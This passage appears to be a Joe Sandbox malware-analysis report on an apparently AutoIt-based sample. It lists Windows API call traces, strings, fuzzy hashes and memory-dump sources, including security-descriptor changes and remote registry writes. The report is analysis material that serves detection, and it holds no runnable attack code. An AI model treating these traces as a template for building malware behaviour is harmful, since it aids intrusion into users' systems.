                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A4303F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 92034dafbcb1b288700d8c96af1ad7f48fb95df9097aafff0b87ed16749dc47d
                                                                      • Instruction ID: 6ab0cdfc3333e58e5ad0095726c89de5f7862fe156affed6831831d5cb5ff178
                                                                      • Opcode Fuzzy Hash: 92034dafbcb1b288700d8c96af1ad7f48fb95df9097aafff0b87ed16749dc47d
                                                                      • Instruction Fuzzy Hash: 1F026E75A00205AFDB14DFA4CC89FAE7BB9FB88721F108558F915AB2A1DB749D01CF60
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00A5712F
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A57160
                                                                      • GetSysColor.USER32(0000000F), ref: 00A5716C
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00A57186
                                                                      • SelectObject.GDI32(?,?), ref: 00A57195
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00A571C0
                                                                      • GetSysColor.USER32(00000010), ref: 00A571C8
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00A571CF
                                                                      • FrameRect.USER32(?,?,00000000), ref: 00A571DE
                                                                      • DeleteObject.GDI32(00000000), ref: 00A571E5
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00A57230
                                                                      • FillRect.USER32(?,?,?), ref: 00A57262
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A57284
                                                                        • Part of subcall function 00A573E8: GetSysColor.USER32(00000012), ref: 00A57421
                                                                        • Part of subcall function 00A573E8: SetTextColor.GDI32(?,?), ref: 00A57425
                                                                        • Part of subcall function 00A573E8: GetSysColorBrush.USER32(0000000F), ref: 00A5743B
                                                                        • Part of subcall function 00A573E8: GetSysColor.USER32(0000000F), ref: 00A57446
                                                                        • Part of subcall function 00A573E8: GetSysColor.USER32(00000011), ref: 00A57463
                                                                        • Part of subcall function 00A573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A57471
                                                                        • Part of subcall function 00A573E8: SelectObject.GDI32(?,00000000), ref: 00A57482
                                                                        • Part of subcall function 00A573E8: SetBkColor.GDI32(?,00000000), ref: 00A5748B
                                                                        • Part of subcall function 00A573E8: SelectObject.GDI32(?,?), ref: 00A57498
                                                                        • Part of subcall function 00A573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00A574B7
                                                                        • Part of subcall function 00A573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A574CE
                                                                        • Part of subcall function 00A573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A574DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                      • String ID:
                                                                      • API String ID: 4124339563-0
                                                                      • Opcode ID: 2f0e1797fcceb5325a1036938871b55d7d991a99d61cd05714b4e4c0837adb52
                                                                      • Instruction ID: 4cb7b0b771ca09ff79ddb7ecbf13c715db175f32d0d2f6be953bc25ca875e386
                                                                      • Opcode Fuzzy Hash: 2f0e1797fcceb5325a1036938871b55d7d991a99d61cd05714b4e4c0837adb52
                                                                      • Instruction Fuzzy Hash: 20A18072008701AFDB11DFA4EC48A5FBBA9FB49332F100B19F962A61E1E771E945CB51
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 009D8E14
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A16AC5
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A16AFE
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A16F43
                                                                        • Part of subcall function 009D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009D8BE8,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 009D8FC5
                                                                      • SendMessageW.USER32(?,00001053), ref: 00A16F7F
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A16F96
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A16FAC
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A16FB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 2760611726-4108050209
                                                                      • Opcode ID: 0b55f717456b7b186f75b1c14acb2e0180ff2f155652834f10edf2ca5ea4bfb2
                                                                      • Instruction ID: 2a9a23ec0090feb1748484b23e932447ae983cdce67a74813f114c6722d3033a
                                                                      • Opcode Fuzzy Hash: 0b55f717456b7b186f75b1c14acb2e0180ff2f155652834f10edf2ca5ea4bfb2
                                                                      • Instruction Fuzzy Hash: 51129C30204211EFDB25DF24D984BEAB7E5FB44311F14856AE485CB6A2CB35EC92DF91
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 00A4273E
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A4286A
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A428A9
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A428B9
                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A42900
                                                                      • GetClientRect.USER32(00000000,?), ref: 00A4290C
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A42955
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A42964
                                                                      • GetStockObject.GDI32(00000011), ref: 00A42974
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A42978
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A42988
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A42991
                                                                      • DeleteDC.GDI32(00000000), ref: 00A4299A
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A429C6
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A429DD
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A42A1D
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A42A31
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A42A42
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A42A77
                                                                      • GetStockObject.GDI32(00000011), ref: 00A42A82
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A42A8D
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A42A97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 3ee20290ada6052db1bc47e0a8618cb937a80f5fbe14941ef10a23ca21ee3bbd
                                                                      • Instruction ID: e8cfb4680a1229ee93055fce825cbf2a8ff02b0add93ac92d1c380e27851101a
                                                                      • Opcode Fuzzy Hash: 3ee20290ada6052db1bc47e0a8618cb937a80f5fbe14941ef10a23ca21ee3bbd
                                                                      • Instruction Fuzzy Hash: BDB15B75A00205AFEB14DFA8CC8AFAE7BB9FB48711F004519F915EB290DB70AD41CB90
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A34AED
                                                                      • GetDriveTypeW.KERNEL32(?,00A5CB68,?,\\.\,00A5CC08), ref: 00A34BCA
                                                                      • SetErrorMode.KERNEL32(00000000,00A5CB68,?,\\.\,00A5CC08), ref: 00A34D36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 2c0ef5d97c7c485d877e61c0110ce6a379e78c89abaabbf39542902878d1fa0d
                                                                      • Instruction ID: 7d76c03db2c4d06e93d58fcf251c0d02d3db15193a2f74c894573021065763ce
                                                                      • Opcode Fuzzy Hash: 2c0ef5d97c7c485d877e61c0110ce6a379e78c89abaabbf39542902878d1fa0d
                                                                      • Instruction Fuzzy Hash: 6C619230605605AFDB04EF24CA82E6DB7B0FB4C744F24941AF806AB692DB35FD41DB42
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 00A57421
                                                                      • SetTextColor.GDI32(?,?), ref: 00A57425
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A5743B
                                                                      • GetSysColor.USER32(0000000F), ref: 00A57446
                                                                      • CreateSolidBrush.GDI32(?), ref: 00A5744B
                                                                      • GetSysColor.USER32(00000011), ref: 00A57463
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A57471
                                                                      • SelectObject.GDI32(?,00000000), ref: 00A57482
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00A5748B
                                                                      • SelectObject.GDI32(?,?), ref: 00A57498
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00A574B7
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A574CE
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A574DB
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A5752A
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A57554
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00A57572
                                                                      • DrawFocusRect.USER32(?,?), ref: 00A5757D
                                                                      • GetSysColor.USER32(00000011), ref: 00A5758E
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00A57596
                                                                      • DrawTextW.USER32(?,00A570F5,000000FF,?,00000000), ref: 00A575A8
                                                                      • SelectObject.GDI32(?,?), ref: 00A575BF
                                                                      • DeleteObject.GDI32(?), ref: 00A575CA
                                                                      • SelectObject.GDI32(?,?), ref: 00A575D0
                                                                      • DeleteObject.GDI32(?), ref: 00A575D5
                                                                      • SetTextColor.GDI32(?,?), ref: 00A575DB
                                                                      • SetBkColor.GDI32(?,?), ref: 00A575E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 0380021bb5b4374c410481054ac3fbf5f6a7134b407813f17d1c28a48c65e80b
                                                                      • Instruction ID: 78bcebc3ea515af67573435e0c1e8359ba88a6513c5a077e71ef4c5af5ee2aeb
                                                                      • Opcode Fuzzy Hash: 0380021bb5b4374c410481054ac3fbf5f6a7134b407813f17d1c28a48c65e80b
                                                                      • Instruction Fuzzy Hash: 54614A72900318AFDB01DFA4DC49EAEBFB9FB08322F114215F915BB2A1E7749941CB90
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00A51128
                                                                      • GetDesktopWindow.USER32 ref: 00A5113D
                                                                      • GetWindowRect.USER32(00000000), ref: 00A51144
• GetWindowLongW.USER32(?,000000F0), ref: 00A51199
• DestroyWindow.USER32(?), ref: 00A511B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A511ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A5120B
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A5121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00A51232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A51245
• IsWindowVisible.USER32(00000000), ref: 00A512A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A512BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A512D0
• GetWindowRect.USER32(00000000,?), ref: 00A512E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 00A5130E
• GetMonitorInfoW.USER32(00000000,?), ref: 00A51328
• CopyRect.USER32(?,?), ref: 00A5133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00A513AA
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 827fb15b7761319300aae94e066ad6333214c79c87ad6d3efebe166ed09480b9
• Instruction ID: 644917cedddceb0203ef1fb40fe0f604533814ad54cf3a6ede6a396c42ed5e71
• Opcode Fuzzy Hash: 827fb15b7761319300aae94e066ad6333214c79c87ad6d3efebe166ed09480b9
• Instruction Fuzzy Hash: 5FB17A71604341AFD700DF64C885F6ABBE4FF88755F00891CF9999B2A1D771E849CB92
APIs
• CharUpperBuffW.USER32(?,?), ref: 00A502E5
• _wcslen.LIBCMT ref: 00A5031F
• _wcslen.LIBCMT ref: 00A50389
• _wcslen.LIBCMT ref: 00A503F1
• _wcslen.LIBCMT ref: 00A50475
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A504C5
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A50504
  • Part of subcall function 009DF9F2: _wcslen.LIBCMT ref: 009DF9FD
  • Part of subcall function 00A2223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A22258
  • Part of subcall function 00A2223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A2228A
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: 074e9679ac8a9daf0cbc94ee205ebf57b1232a3cbc05cd30ce1ba715f8a1eda3
• Instruction ID: 6c3578b3066925b4e9e4f8b85ab08b1b9ce1fc708dd5110989c98414dcc67fbf
• Opcode Fuzzy Hash: 074e9679ac8a9daf0cbc94ee205ebf57b1232a3cbc05cd30ce1ba715f8a1eda3
• Instruction Fuzzy Hash: 66E19A316082019FC714EF24C551E2EB7E6BFD8315B14896DF896AB3A1DB30ED49CB82
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009D8968
• GetSystemMetrics.USER32(00000007), ref: 009D8970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009D899B
• GetSystemMetrics.USER32(00000008), ref: 009D89A3
• GetSystemMetrics.USER32(00000004), ref: 009D89C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009D89E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009D89F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009D8A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009D8A3C
• GetClientRect.USER32(00000000,000000FF), ref: 009D8A5A
• GetStockObject.GDI32(00000011), ref: 009D8A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 009D8A81
  • Part of subcall function 009D912D: GetCursorPos.USER32(?), ref: 009D9141
  • Part of subcall function 009D912D: ScreenToClient.USER32(00000000,?), ref: 009D915E
  • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000001), ref: 009D9183
  • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000002), ref: 009D919D
• SetTimer.USER32(00000000,00000000,00000028,009D90FC), ref: 009D8AA8
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 3b389d16d6b3a5affb7e0f86a96cafd3d3874f17e7813e8d8b04b0d12b70c488
• Instruction ID: 2412d4bd56085cd9fad7bc668291f9191e7e4d4dafca4b9442ed66317f61ae11
• Opcode Fuzzy Hash: 3b389d16d6b3a5affb7e0f86a96cafd3d3874f17e7813e8d8b04b0d12b70c488
• Instruction Fuzzy Hash: 0AB16D75A4030A9FDB14DFA8CC95BEE3BB5FB48315F10822AFA15E7290DB34A941CB51
APIs
  • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A21114
  • Part of subcall function 00A210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21120
  • Part of subcall function 00A210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A2112F
  • Part of subcall function 00A210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21136
  • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A2114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A20DF5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A20E29
• GetLengthSid.ADVAPI32(?), ref: 00A20E40
• GetAce.ADVAPI32(?,00000000,?), ref: 00A20E7A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A20E96
• GetLengthSid.ADVAPI32(?), ref: 00A20EAD
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A20EB5
• HeapAlloc.KERNEL32(00000000), ref: 00A20EBC
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A20EDD
• CopySid.ADVAPI32(00000000), ref: 00A20EE4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A20F13
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A20F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A20F47
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20F6E
• HeapFree.KERNEL32(00000000), ref: 00A20F75
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20F7E
• HeapFree.KERNEL32(00000000), ref: 00A20F85
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20F8E
• HeapFree.KERNEL32(00000000), ref: 00A20F95
• GetProcessHeap.KERNEL32(00000000,?), ref: 00A20FA1
• HeapFree.KERNEL32(00000000), ref: 00A20FA8
  • Part of subcall function 00A21193: GetProcessHeap.KERNEL32(00000008,00A20BB1,?,00000000,?,00A20BB1,?), ref: 00A211A1
  • Part of subcall function 00A21193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A20BB1,?), ref: 00A211A8
  • Part of subcall function 00A21193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A20BB1,?), ref: 00A211B7
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 88e518ae62be6c3105aa111d863bb82ebc307244893df50daf8ac814c0bc20c3
• Instruction ID: 6b3d2acec63cbba19e138f7458f9e61bfd1f8269febf8deb4106329986c1c7ab
• Opcode Fuzzy Hash: 88e518ae62be6c3105aa111d863bb82ebc307244893df50daf8ac814c0bc20c3
• Instruction Fuzzy Hash: 4C714A7290032AAFDF20DFA8ED44FAEBBB8FF04311F144125E919E6192D7719905CB60
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4C4BD
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00A5CC08,00000000,?,00000000,?,?), ref: 00A4C544
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A4C5A4
• _wcslen.LIBCMT ref: 00A4C5F4
• _wcslen.LIBCMT ref: 00A4C66F
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A4C6B2
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A4C7C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A4C84D
• RegCloseKey.ADVAPI32(?), ref: 00A4C881
• RegCloseKey.ADVAPI32(00000000), ref: 00A4C88E
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A4C960
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
